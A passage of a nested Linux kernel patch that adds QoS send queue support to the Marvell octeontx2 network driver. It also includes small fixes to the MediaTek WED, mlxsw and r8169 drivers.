+ 		goto err_free_mem;
+@@ -1737,6 +1759,11 @@ int otx2_open(struct net_device *netdev)
+ 		else
+ 			cq_poll->cq_ids[CQ_XDP] = CINT_INVALID_CQ;
+ 
++		cq_poll->cq_ids[CQ_QOS] = (qidx < pf->hw.tc_tx_queues) ?
++					  (qidx + pf->hw.rx_queues +
++					   pf->hw.non_qos_queues) :
++					  CINT_INVALID_CQ;
++
+ 		cq_poll->dev = (void *)pf;
+ 		cq_poll->dim.mode = DIM_CQ_PERIOD_MODE_START_FROM_CQE;
+ 		INIT_WORK(&cq_poll->dim.work, otx2_dim_work);
+@@ -1941,6 +1968,12 @@ static netdev_tx_t otx2_xmit(struct sk_buff *skb, struct net_device *netdev)
+ 	int qidx = skb_get_queue_mapping(skb);
+ 	struct otx2_snd_queue *sq;
+ 	struct netdev_queue *txq;
++	int sq_idx;
++
++	/* XDP SQs are not mapped with TXQs
++	 * advance qid to derive correct sq mapped with QOS
++	 */
++	sq_idx = (qidx >= pf->hw.tx_queues) ? (qidx + pf->hw.xdp_queues) : qidx;
+ 
+ 	/* Check for minimum and maximum packet length */
+ 	if (skb->len <= ETH_HLEN ||
+@@ -1949,7 +1982,7 @@ static netdev_tx_t otx2_xmit(struct sk_buff *skb, struct net_device *netdev)
+ 		return NETDEV_TX_OK;
+ 	}
+ 
+-	sq = &pf->qset.sq[qidx];
++	sq = &pf->qset.sq[sq_idx];
+ 	txq = netdev_get_tx_queue(netdev, qidx);
+ 
+ 	if (!otx2_sq_append_skb(netdev, sq, skb, qidx)) {
+@@ -1967,8 +2000,8 @@ static netdev_tx_t otx2_xmit(struct sk_buff *skb, struct net_device *netdev)
+ 	return NETDEV_TX_OK;
+ }
+ 
+-static u16 otx2_select_queue(struct net_device *netdev, struct sk_buff *skb,
+-			     struct net_device *sb_dev)
++u16 otx2_select_queue(struct net_device *netdev, struct sk_buff *skb,
++		      struct net_device *sb_dev)
+ {
+ #ifdef CONFIG_DCB
+ 	struct otx2_nic *pf = netdev_priv(netdev);
+@@ -1990,6 +2023,7 @@ pick_tx:
+ #endif
+ 	return netdev_pick_tx(netdev, skb, NULL);
+ }
++EXPORT_SYMBOL(otx2_select_queue);
+ 
+ static netdev_features_t otx2_fix_features(struct net_device *dev,
+ 					   netdev_features_t features)
+@@ -2520,7 +2554,7 @@ static int otx2_xdp_setup(struct otx2_nic *pf, struct bpf_prog *prog)
+ 	else
+ 		pf->hw.xdp_queues = 0;
+ 
+-	pf->hw.tot_tx_queues += pf->hw.xdp_queues;
++	pf->hw.non_qos_queues += pf->hw.xdp_queues;
+ 
+ 	if (if_up)
+ 		otx2_open(pf->netdev);
+@@ -2703,10 +2737,10 @@ static void otx2_sriov_vfcfg_cleanup(struct otx2_nic *pf)
+ static int otx2_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ {
+ 	struct device *dev = &pdev->dev;
++	int err, qcount, qos_txqs;
+ 	struct net_device *netdev;
+ 	struct otx2_nic *pf;
+ 	struct otx2_hw *hw;
+-	int err, qcount;
+ 	int num_vec;
+ 
+ 	err = pcim_enable_device(pdev);
+@@ -2731,8 +2765,9 @@ static int otx2_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 
+ 	/* Set number of queues */
+ 	qcount = min_t(int, num_online_cpus(), OTX2_MAX_CQ_CNT);
++	qos_txqs = min_t(int, qcount, OTX2_QOS_MAX_LEAF_NODES);
+ 
+-	netdev = alloc_etherdev_mqs(sizeof(*pf), qcount, qcount);
++	netdev = alloc_etherdev_mqs(sizeof(*pf), qcount + qos_txqs, qcount);
+ 	if (!netdev) {
+ 		err = -ENOMEM;
+ 		goto err_release_regions;
+@@ -2751,7 +2786,7 @@ static int otx2_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	hw->pdev = pdev;
+ 	hw->rx_queues = qcount;
+ 	hw->tx_queues = qcount;
+-	hw->tot_tx_queues = qcount;
++	hw->non_qos_queues = qcount;
+ 	hw->max_queues = qcount;
+ 	hw->rbuf_len = OTX2_DEFAULT_RBUF_LEN;
+ 	/* Use CQE of 128 byte descriptor size by default */
+@@ -2919,6 +2954,8 @@ static int otx2_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 		goto err_pf_sriov_init;
+ #endif
+ 
++	otx2_qos_init(pf, qos_txqs);
++
+ 	return 0;
+ 
+ err_pf_sriov_init:
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_struct.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_struct.h
+index fa37b9f312cae..4e5899d8fa2e6 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_struct.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_struct.h
+@@ -318,23 +318,23 @@ enum nix_snd_status_e {
+ 	NIX_SND_STATUS_EXT_ERR = 0x6,
+ 	NIX_SND_STATUS_JUMP_FAULT = 0x7,
+ 	NIX_SND_STATUS_JUMP_POISON = 0x8,
+-	NIX_SND_STATUS_CRC_ERR = 0x9,
+-	NIX_SND_STATUS_IMM_ERR = 0x10,
+-	NIX_SND_STATUS_SG_ERR = 0x11,
+-	NIX_SND_STATUS_MEM_ERR = 0x12,
+-	NIX_SND_STATUS_INVALID_SUBDC = 0x13,
+-	NIX_SND_STATUS_SUBDC_ORDER_ERR = 0x14,
+-	NIX_SND_STATUS_DATA_FAULT = 0x15,
+-	NIX_SND_STATUS_DATA_POISON = 0x16,
+-	NIX_SND_STATUS_NPC_DROP_ACTION = 0x17,
+-	NIX_SND_STATUS_LOCK_VIOL = 0x18,
+-	NIX_SND_STATUS_NPC_UCAST_CHAN_ERR = 0x19,
+-	NIX_SND_STATUS_NPC_MCAST_CHAN_ERR = 0x20,
+-	NIX_SND_STATUS_NPC_MCAST_ABORT = 0x21,
+-	NIX_SND_STATUS_NPC_VTAG_PTR_ERR = 0x22,
+-	NIX_SND_STATUS_NPC_VTAG_SIZE_ERR = 0x23,
+-	NIX_SND_STATUS_SEND_MEM_FAULT = 0x24,
+-	NIX_SND_STATUS_SEND_STATS_ERR = 0x25,
++	NIX_SND_STATUS_CRC_ERR = 0x10,
++	NIX_SND_STATUS_IMM_ERR = 0x11,
++	NIX_SND_STATUS_SG_ERR = 0x12,
++	NIX_SND_STATUS_MEM_ERR = 0x13,
++	NIX_SND_STATUS_INVALID_SUBDC = 0x14,
++	NIX_SND_STATUS_SUBDC_ORDER_ERR = 0x15,
++	NIX_SND_STATUS_DATA_FAULT = 0x16,
++	NIX_SND_STATUS_DATA_POISON = 0x17,
++	NIX_SND_STATUS_NPC_DROP_ACTION = 0x20,
++	NIX_SND_STATUS_LOCK_VIOL = 0x21,
++	NIX_SND_STATUS_NPC_UCAST_CHAN_ERR = 0x22,
++	NIX_SND_STATUS_NPC_MCAST_CHAN_ERR = 0x23,
++	NIX_SND_STATUS_NPC_MCAST_ABORT = 0x24,
++	NIX_SND_STATUS_NPC_VTAG_PTR_ERR = 0x25,
++	NIX_SND_STATUS_NPC_VTAG_SIZE_ERR = 0x26,
++	NIX_SND_STATUS_SEND_MEM_FAULT = 0x27,
++	NIX_SND_STATUS_SEND_STATS_ERR = 0x28,
+ 	NIX_SND_STATUS_MAX,
+ };
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+index 5704fb75fa477..20d801d30c732 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+@@ -468,12 +468,13 @@ process_cqe:
+ 			break;
+ 		}
+ 
+-		if (cq->cq_type == CQ_XDP) {
++		qidx = cq->cq_idx - pfvf->hw.rx_queues;
++
++		if (cq->cq_type == CQ_XDP)
+ 			otx2_xdp_snd_pkt_handler(pfvf, sq, cqe);
+-		} else {
+-			otx2_snd_pkt_handler(pfvf, cq, sq, cqe, budget,
+-					     &tx_pkts, &tx_bytes);
+-		}
++		else
++			otx2_snd_pkt_handler(pfvf, cq, &pfvf->qset.sq[qidx],
++					     cqe, budget, &tx_pkts, &tx_bytes);
+ 
+ 		cqe->hdr.cqe_type = NIX_XQE_TYPE_INVALID;
+ 		processed_cqe++;
+@@ -490,7 +491,11 @@ process_cqe:
+ 	if (likely(tx_pkts)) {
+ 		struct netdev_queue *txq;
+ 
+-		txq = netdev_get_tx_queue(pfvf->netdev, cq->cint_idx);
++		qidx = cq->cq_idx - pfvf->hw.rx_queues;
++
++		if (qidx >= pfvf->hw.tx_queues)
++			qidx -= pfvf->hw.xdp_queues;
++		txq = netdev_get_tx_queue(pfvf->netdev, qidx);
+ 		netdev_tx_completed_queue(txq, tx_pkts, tx_bytes);
+ 		/* Check if queue was stopped earlier due to ring full */
+ 		smp_mb();
+@@ -738,7 +743,8 @@ static void otx2_sqe_add_hdr(struct otx2_nic *pfvf, struct otx2_snd_queue *sq,
+ 		sqe_hdr->aura = sq->aura_id;
+ 		/* Post a CQE Tx after pkt transmission */
+ 		sqe_hdr->pnc = 1;
+-		sqe_hdr->sq = qidx;
++		sqe_hdr->sq = (qidx >=  pfvf->hw.tx_queues) ?
++			       qidx + pfvf->hw.xdp_queues : qidx;
+ 	}
+ 	sqe_hdr->total = skb->len;
+ 	/* Set SQE identifier which will be used later for freeing SKB */
+@@ -1218,13 +1224,17 @@ void otx2_cleanup_rx_cqes(struct otx2_nic *pfvf, struct otx2_cq_queue *cq)
+ 
+ void otx2_cleanup_tx_cqes(struct otx2_nic *pfvf, struct otx2_cq_queue *cq)
+ {
++	int tx_pkts = 0, tx_bytes = 0;
+ 	struct sk_buff *skb = NULL;
+ 	struct otx2_snd_queue *sq;
+ 	struct nix_cqe_tx_s *cqe;
++	struct netdev_queue *txq;
+ 	int processed_cqe = 0;
+ 	struct sg_list *sg;
++	int qidx;
+ 
+-	sq = &pfvf->qset.sq[cq->cint_idx];
++	qidx = cq->cq_idx - pfvf->hw.rx_queues;
++	sq = &pfvf->qset.sq[qidx];
+ 
+ 	if (otx2_nix_cq_op_status(pfvf, cq) || !cq->pend_cqe)
+ 		return;
+@@ -1239,12 +1249,20 @@ void otx2_cleanup_tx_cqes(struct otx2_nic *pfvf, struct otx2_cq_queue *cq)
+ 		sg = &sq->sg[cqe->comp.sqe_id];
+ 		skb = (struct sk_buff *)sg->skb;
+ 		if (skb) {
++			tx_bytes += skb->len;
++			tx_pkts++;
+ 			otx2_dma_unmap_skb_frags(pfvf, sg);
+ 			dev_kfree_skb_any(skb);
+ 			sg->skb = (u64)NULL;
+ 		}
+ 	}
+ 
++	if (likely(tx_pkts)) {
++		if (qidx >= pfvf->hw.tx_queues)
++			qidx -= pfvf->hw.xdp_queues;
++		txq = netdev_get_tx_queue(pfvf->netdev, qidx);
++		netdev_tx_completed_queue(txq, tx_pkts, tx_bytes);
++	}
+ 	/* Free CQEs to HW */
+ 	otx2_write64(pfvf, NIX_LF_CQ_OP_DOOR,
+ 		     ((u64)cq->cq_idx << 32) | processed_cqe);
+@@ -1271,6 +1289,38 @@ int otx2_rxtx_enable(struct otx2_nic *pfvf, bool enable)
+ 	return err;
+ }
+ 
++void otx2_free_pending_sqe(struct otx2_nic *pfvf)
++{
++	int tx_pkts = 0, tx_bytes = 0;
++	struct sk_buff *skb = NULL;
++	struct otx2_snd_queue *sq;
++	struct netdev_queue *txq;
++	struct sg_list *sg;
++	int sq_idx, sqe;
++
++	for (sq_idx = 0; sq_idx < pfvf->hw.tx_queues; sq_idx++) {
++		sq = &pfvf->qset.sq[sq_idx];
++		for (sqe = 0; sqe < sq->sqe_cnt; sqe++) {
++			sg = &sq->sg[sqe];
++			skb = (struct sk_buff *)sg->skb;
++			if (skb) {
++				tx_bytes += skb->len;
++				tx_pkts++;
++				otx2_dma_unmap_skb_frags(pfvf, sg);
++				dev_kfree_skb_any(skb);
++				sg->skb = (u64)NULL;
++			}
++		}
++
++		if (!tx_pkts)
++			continue;
++		txq = netdev_get_tx_queue(pfvf->netdev, sq_idx);
++		netdev_tx_completed_queue(txq, tx_pkts, tx_bytes);
++		tx_pkts = 0;
++		tx_bytes = 0;
++	}
++}
++
+ static void otx2_xdp_sqe_add_sg(struct otx2_snd_queue *sq, u64 dma_addr,
+ 				int len, int *offset)
+ {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.h
+index 93cac2c2664c2..7ab6db9a986fa 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.h
+@@ -102,7 +102,8 @@ enum cq_type {
+ 	CQ_RX,
+ 	CQ_TX,
+ 	CQ_XDP,
+-	CQS_PER_CINT = 3, /* RQ + SQ + XDP */
++	CQ_QOS,
++	CQS_PER_CINT = 4, /* RQ + SQ + XDP + QOS_SQ */
+ };
+ 
+ struct otx2_cq_poll {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+index f8f0c01f62a14..404855bccb4b6 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+@@ -475,6 +475,7 @@ static const struct net_device_ops otx2vf_netdev_ops = {
+ 	.ndo_open = otx2vf_open,
+ 	.ndo_stop = otx2vf_stop,
+ 	.ndo_start_xmit = otx2vf_xmit,
++	.ndo_select_queue = otx2_select_queue,
+ 	.ndo_set_rx_mode = otx2vf_set_rx_mode,
+ 	.ndo_set_mac_address = otx2_set_mac_address,
+ 	.ndo_change_mtu = otx2vf_change_mtu,
+@@ -520,10 +521,10 @@ static int otx2vf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ {
+ 	int num_vec = pci_msix_vec_count(pdev);
+ 	struct device *dev = &pdev->dev;
++	int err, qcount, qos_txqs;
+ 	struct net_device *netdev;
+ 	struct otx2_nic *vf;
+ 	struct otx2_hw *hw;
+-	int err, qcount;
+ 
+ 	err = pcim_enable_device(pdev);
+ 	if (err) {
+@@ -546,7 +547,8 @@ static int otx2vf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	pci_set_master(pdev);
+ 
+ 	qcount = num_online_cpus();
+-	netdev = alloc_etherdev_mqs(sizeof(*vf), qcount, qcount);
++	qos_txqs = min_t(int, qcount, OTX2_QOS_MAX_LEAF_NODES);
++	netdev = alloc_etherdev_mqs(sizeof(*vf), qcount + qos_txqs, qcount);
+ 	if (!netdev) {
+ 		err = -ENOMEM;
+ 		goto err_release_regions;
+@@ -566,7 +568,7 @@ static int otx2vf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	hw->rx_queues = qcount;
+ 	hw->tx_queues = qcount;
+ 	hw->max_queues = qcount;
+-	hw->tot_tx_queues = qcount;
++	hw->non_qos_queues = qcount;
+ 	hw->rbuf_len = OTX2_DEFAULT_RBUF_LEN;
+ 	/* Use CQE of 128 byte descriptor size by default */
+ 	hw->xqe_size = 128;
+@@ -695,6 +697,7 @@ static int otx2vf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	if (err)
+ 		goto err_shutdown_tc;
+ #endif
++	otx2_qos_init(vf, qos_txqs);
+ 
+ 	return 0;
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/qos.h b/drivers/net/ethernet/marvell/octeontx2/nic/qos.h
+new file mode 100644
+index 0000000000000..73a62d092e99a
+--- /dev/null
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/qos.h
+@@ -0,0 +1,19 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/* Marvell RVU Ethernet driver
++ *
++ * Copyright (C) 2023 Marvell.
++ *
++ */
++#ifndef OTX2_QOS_H
++#define OTX2_QOS_H
++
++#define OTX2_QOS_MAX_LEAF_NODES                16
++
++int otx2_qos_enable_sq(struct otx2_nic *pfvf, int qidx, u16 smq);
++void otx2_qos_disable_sq(struct otx2_nic *pfvf, int qidx, u16 mdq);
++
++struct otx2_qos {
++	       u16 qid_to_sqmap[OTX2_QOS_MAX_LEAF_NODES];
++	};
++
++#endif
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/qos_sq.c b/drivers/net/ethernet/marvell/octeontx2/nic/qos_sq.c
+new file mode 100644
+index 0000000000000..e142d43f5a62c
+--- /dev/null
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/qos_sq.c
+@@ -0,0 +1,282 @@
++// SPDX-License-Identifier: GPL-2.0
++/* Marvell RVU Physical Function ethernet driver
++ *
++ * Copyright (C) 2023 Marvell.
++ *
++ */
++
++#include <linux/netdevice.h>
++#include <net/tso.h>
++
++#include "cn10k.h"
++#include "otx2_reg.h"
++#include "otx2_common.h"
++#include "otx2_txrx.h"
++#include "otx2_struct.h"
++
++#define OTX2_QOS_MAX_LEAF_NODES 16
++
++static void otx2_qos_aura_pool_free(struct otx2_nic *pfvf, int pool_id)
++{
++	struct otx2_pool *pool;
++
++	if (!pfvf->qset.pool)
++		return;
++
++	pool = &pfvf->qset.pool[pool_id];
++	qmem_free(pfvf->dev, pool->stack);
++	qmem_free(pfvf->dev, pool->fc_addr);
++	pool->stack = NULL;
++	pool->fc_addr = NULL;
++}
++
++static int otx2_qos_sq_aura_pool_init(struct otx2_nic *pfvf, int qidx)
++{
++	struct otx2_qset *qset = &pfvf->qset;
++	int pool_id, stack_pages, num_sqbs;
++	struct otx2_hw *hw = &pfvf->hw;
++	struct otx2_snd_queue *sq;
++	struct otx2_pool *pool;
++	dma_addr_t bufptr;
++	int err, ptr;
++	u64 iova, pa;
++
++	/* Calculate number of SQBs needed.
++	 *
++	 * For a 128byte SQE, and 4K size SQB, 31 SQEs will fit in one SQB.
++	 * Last SQE is used for pointing to next SQB.
++	 */
++	num_sqbs = (hw->sqb_size / 128) - 1;
++	num_sqbs = (qset->sqe_cnt + num_sqbs) / num_sqbs;
++
++	/* Get no of stack pages needed */
++	stack_pages =
++		(num_sqbs + hw->stack_pg_ptrs - 1) / hw->stack_pg_ptrs;
++
++	pool_id = otx2_get_pool_idx(pfvf, AURA_NIX_SQ, qidx);
++	pool = &pfvf->qset.pool[pool_id];
++
++	/* Initialize aura context */
++	err = otx2_aura_init(pfvf, pool_id, pool_id, num_sqbs);
++	if (err)
++		return err;
++
++	/* Initialize pool context */
++	err = otx2_pool_init(pfvf, pool_id, stack_pages,
++			     num_sqbs, hw->sqb_size);
++	if (err)
++		goto aura_free;
++
++	/* Flush accumulated messages */
++	err = otx2_sync_mbox_msg(&pfvf->mbox);
++	if (err)
++		goto pool_free;
++
++	/* Allocate pointers and free them to aura/pool */
++	sq = &qset->sq[qidx];
++	sq->sqb_count = 0;
++	sq->sqb_ptrs = kcalloc(num_sqbs, sizeof(*sq->sqb_ptrs), GFP_KERNEL);
++	if (!sq->sqb_ptrs) {
++		err = -ENOMEM;
++		goto pool_free;
++	}
++
++	for (ptr = 0; ptr < num_sqbs; ptr++) {
++		err = otx2_alloc_rbuf(pfvf, pool, &bufptr);
++		if (err)
++			goto sqb_free;
++		pfvf->hw_ops->aura_freeptr(pfvf, pool_id, bufptr);
++		sq->sqb_ptrs[sq->sqb_count++] = (u64)bufptr;
++	}
++
++	return 0;
++
++sqb_free:
++	while (ptr--) {
++		if (!sq->sqb_ptrs[ptr])
++			continue;
++		iova = sq->sqb_ptrs[ptr];
++		pa = otx2_iova_to_phys(pfvf->iommu_domain, iova);
++		dma_unmap_page_attrs(pfvf->dev, iova, hw->sqb_size,
++				     DMA_FROM_DEVICE,
++				     DMA_ATTR_SKIP_CPU_SYNC);
++		put_page(virt_to_page(phys_to_virt(pa)));
++		otx2_aura_allocptr(pfvf, pool_id);
++	}
++	sq->sqb_count = 0;
++	kfree(sq->sqb_ptrs);
++pool_free:
++	qmem_free(pfvf->dev, pool->stack);
++aura_free:
++	qmem_free(pfvf->dev, pool->fc_addr);
++	otx2_mbox_reset(&pfvf->mbox.mbox, 0);
++	return err;
++}
++
++static void otx2_qos_sq_free_sqbs(struct otx2_nic *pfvf, int qidx)
++{
++	struct otx2_qset *qset = &pfvf->qset;
++	struct otx2_hw *hw = &pfvf->hw;
++	struct otx2_snd_queue *sq;
++	u64 iova, pa;
++	int sqb;
++
++	sq = &qset->sq[qidx];
++	if (!sq->sqb_ptrs)
++		return;
++	for (sqb = 0; sqb < sq->sqb_count; sqb++) {
++		if (!sq->sqb_ptrs[sqb])
++			continue;
++		iova = sq->sqb_ptrs[sqb];
++		pa = otx2_iova_to_phys(pfvf->iommu_domain, iova);
++		dma_unmap_page_attrs(pfvf->dev, iova, hw->sqb_size,
++				     DMA_FROM_DEVICE,
++				     DMA_ATTR_SKIP_CPU_SYNC);
++		put_page(virt_to_page(phys_to_virt(pa)));
++	}
++
++	sq->sqb_count = 0;
++
++	sq = &qset->sq[qidx];
++	qmem_free(pfvf->dev, sq->sqe);
++	qmem_free(pfvf->dev, sq->tso_hdrs);
++	kfree(sq->sg);
++	kfree(sq->sqb_ptrs);
++	qmem_free(pfvf->dev, sq->timestamps);
++
++	memset((void *)sq, 0, sizeof(*sq));
++}
++
++/* send queue id */
++static void otx2_qos_sqb_flush(struct otx2_nic *pfvf, int qidx)
++{
++	int sqe_tail, sqe_head;
++	u64 incr, *ptr, val;
++
++	ptr = (__force u64 *)otx2_get_regaddr(pfvf, NIX_LF_SQ_OP_STATUS);
++	incr = (u64)qidx << 32;
++	val = otx2_atomic64_add(incr, ptr);
++	sqe_head = (val >> 20) & 0x3F;
++	sqe_tail = (val >> 28) & 0x3F;
++	if (sqe_head != sqe_tail)
++		usleep_range(50, 60);
++}
++
++static int otx2_qos_ctx_disable(struct otx2_nic *pfvf, u16 qidx, int aura_id)
++{
++	struct nix_cn10k_aq_enq_req *cn10k_sq_aq;
++	struct npa_aq_enq_req *aura_aq;
++	struct npa_aq_enq_req *pool_aq;
++	struct nix_aq_enq_req *sq_aq;
++
++	if (test_bit(CN10K_LMTST, &pfvf->hw.cap_flag)) {
++		cn10k_sq_aq = otx2_mbox_alloc_msg_nix_cn10k_aq_enq(&pfvf->mbox);
++		if (!cn10k_sq_aq)
++			return -ENOMEM;
++		cn10k_sq_aq->qidx = qidx;
++		cn10k_sq_aq->sq.ena = 0;
++		cn10k_sq_aq->sq_mask.ena = 1;
++		cn10k_sq_aq->ctype = NIX_AQ_CTYPE_SQ;
++		cn10k_sq_aq->op = NIX_AQ_INSTOP_WRITE;
++	} else {
++		sq_aq = otx2_mbox_alloc_msg_nix_aq_enq(&pfvf->mbox);
++		if (!sq_aq)
++			return -ENOMEM;
++		sq_aq->qidx = qidx;
++		sq_aq->sq.ena = 0;
++		sq_aq->sq_mask.ena = 1;
++		sq_aq->ctype = NIX_AQ_CTYPE_SQ;
++		sq_aq->op = NIX_AQ_INSTOP_WRITE;
++	}
++
++	aura_aq = otx2_mbox_alloc_msg_npa_aq_enq(&pfvf->mbox);
++	if (!aura_aq) {
++		otx2_mbox_reset(&pfvf->mbox.mbox, 0);
++		return -ENOMEM;
++	}
++
++	aura_aq->aura_id = aura_id;
++	aura_aq->aura.ena = 0;
++	aura_aq->aura_mask.ena = 1;
++	aura_aq->ctype = NPA_AQ_CTYPE_AURA;
++	aura_aq->op = NPA_AQ_INSTOP_WRITE;
++
++	pool_aq = otx2_mbox_alloc_msg_npa_aq_enq(&pfvf->mbox);
++	if (!pool_aq) {
++		otx2_mbox_reset(&pfvf->mbox.mbox, 0);
++		return -ENOMEM;
++	}
++
++	pool_aq->aura_id = aura_id;
++	pool_aq->pool.ena = 0;
++	pool_aq->pool_mask.ena = 1;
++
++	pool_aq->ctype = NPA_AQ_CTYPE_POOL;
++	pool_aq->op = NPA_AQ_INSTOP_WRITE;
++
++	return otx2_sync_mbox_msg(&pfvf->mbox);
++}
++
++int otx2_qos_enable_sq(struct otx2_nic *pfvf, int qidx, u16 smq)
++{
++	struct otx2_hw *hw = &pfvf->hw;
++	int pool_id, sq_idx, err;
++
++	if (pfvf->flags & OTX2_FLAG_INTF_DOWN)
++		return -EPERM;
++
++	sq_idx = hw->non_qos_queues + qidx;
++
++	mutex_lock(&pfvf->mbox.lock);
++	err = otx2_qos_sq_aura_pool_init(pfvf, sq_idx);
++	if (err)
++		goto out;
++
++	pool_id = otx2_get_pool_idx(pfvf, AURA_NIX_SQ, sq_idx);
++	pfvf->qos.qid_to_sqmap[qidx] = smq;
++	err = otx2_sq_init(pfvf, sq_idx, pool_id);
++	if (err)
++		goto out;
++out:
++	mutex_unlock(&pfvf->mbox.lock);
++	return err;
++}
++
++void otx2_qos_disable_sq(struct otx2_nic *pfvf, int qidx, u16 mdq)
++{
++	struct otx2_qset *qset = &pfvf->qset;
++	struct otx2_hw *hw = &pfvf->hw;
++	struct otx2_snd_queue *sq;
++	struct otx2_cq_queue *cq;
++	int pool_id, sq_idx;
++
++	sq_idx = hw->non_qos_queues + qidx;
++
++	/* If the DOWN flag is set SQs are already freed */
++	if (pfvf->flags & OTX2_FLAG_INTF_DOWN)
++		return;
++
++	sq = &pfvf->qset.sq[sq_idx];
++	if (!sq->sqb_ptrs)
++		return;
++
++	if (sq_idx < hw->non_qos_queues ||
++	    sq_idx >= otx2_get_total_tx_queues(pfvf)) {
++		netdev_err(pfvf->netdev, "Send Queue is not a QoS queue\n");
++		return;
++	}
++
++	cq = &qset->cq[pfvf->hw.rx_queues + sq_idx];
++	pool_id = otx2_get_pool_idx(pfvf, AURA_NIX_SQ, sq_idx);
++
++	otx2_qos_sqb_flush(pfvf, sq_idx);
++	otx2_smq_flush(pfvf, otx2_get_smq_idx(pfvf, sq_idx));
++	otx2_cleanup_tx_cqes(pfvf, cq);
++
++	mutex_lock(&pfvf->mbox.lock);
++	otx2_qos_ctx_disable(pfvf, sq_idx, pool_id);
++	mutex_unlock(&pfvf->mbox.lock);
++
++	otx2_qos_sq_free_sqbs(pfvf, sq_idx);
++	otx2_qos_aura_pool_free(pfvf, pool_id);
++}
+diff --git a/drivers/net/ethernet/mediatek/mtk_wed_regs.h b/drivers/net/ethernet/mediatek/mtk_wed_regs.h
+index e270fb3361432..14cd44f8191ba 100644
+--- a/drivers/net/ethernet/mediatek/mtk_wed_regs.h
++++ b/drivers/net/ethernet/mediatek/mtk_wed_regs.h
+@@ -51,8 +51,8 @@ struct mtk_wdma_desc {
+ #define MTK_WED_EXT_INT_STATUS_TKID_TITO_INVALID	BIT(4)
+ #define MTK_WED_EXT_INT_STATUS_TX_FBUF_LO_TH		BIT(8)
+ #define MTK_WED_EXT_INT_STATUS_TX_FBUF_HI_TH		BIT(9)
+-#define MTK_WED_EXT_INT_STATUS_RX_FBUF_LO_TH		BIT(12)
+-#define MTK_WED_EXT_INT_STATUS_RX_FBUF_HI_TH		BIT(13)
++#define MTK_WED_EXT_INT_STATUS_RX_FBUF_LO_TH		BIT(10) /* wed v2 */
++#define MTK_WED_EXT_INT_STATUS_RX_FBUF_HI_TH		BIT(11) /* wed v2 */
+ #define MTK_WED_EXT_INT_STATUS_RX_DRV_R_RESP_ERR	BIT(16)
+ #define MTK_WED_EXT_INT_STATUS_RX_DRV_W_RESP_ERR	BIT(17)
+ #define MTK_WED_EXT_INT_STATUS_RX_DRV_COHERENT		BIT(18)
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_bloom_filter.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_bloom_filter.c
+index e2aced7ab4547..95f63fcf4ba1f 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_bloom_filter.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_bloom_filter.c
+@@ -496,7 +496,7 @@ mlxsw_sp_acl_bf_init(struct mlxsw_sp *mlxsw_sp, unsigned int num_erp_banks)
+ 	 * is 2^ACL_MAX_BF_LOG
+ 	 */
+ 	bf_bank_size = 1 << MLXSW_CORE_RES_GET(mlxsw_sp->core, ACL_MAX_BF_LOG);
+-	bf = kzalloc(struct_size(bf, refcnt, bf_bank_size * num_erp_banks),
++	bf = kzalloc(struct_size(bf, refcnt, size_mul(bf_bank_size, num_erp_banks)),
+ 		     GFP_KERNEL);
+ 	if (!bf)
+ 		return ERR_PTR(-ENOMEM);
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index 80b6079b8a8e3..d14706265d9cb 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -2512,9 +2512,13 @@ static void rtl_set_rx_mode(struct net_device *dev)
+ 
+ 	if (dev->flags & IFF_PROMISC) {
+ 		rx_mode |= AcceptAllPhys;
++	} else if (!(dev->flags & IFF_MULTICAST)) {
++		rx_mode &= ~AcceptMulticast;
+ 	} else if (netdev_mc_count(dev) > MC_FILTER_LIMIT ||
+ 		   dev->flags & IFF_ALLMULTI ||
+-		   tp->mac_version == RTL_GIGA_MAC_VER_35) {
++		   tp->mac_version == RTL_GIGA_MAC_VER_35 ||
++		   tp->mac_version == RTL_GIGA_MAC_VER_46 ||
++		   tp->mac_version == RTL_GIGA_MAC_VER_48) {
+ 		/* accept all multicasts */
+ 	} else if (netdev_mc_empty(dev)) {
+ 		rx_mode &= ~AcceptMulticast;
+@@ -4556,12 +4560,17 @@ static int rtl8169_poll(struct napi_struct *napi, int budget)
+ static void r8169_phylink_handler(struct net_device *ndev)
+ {
+ 	struct rtl8169_private *tp = netdev_priv(ndev);
++	struct device *d = tp_to_dev(tp);
+ 
+ 	if (netif_carrier_ok(ndev)) {
+ 		rtl_link_chg_patch(tp);
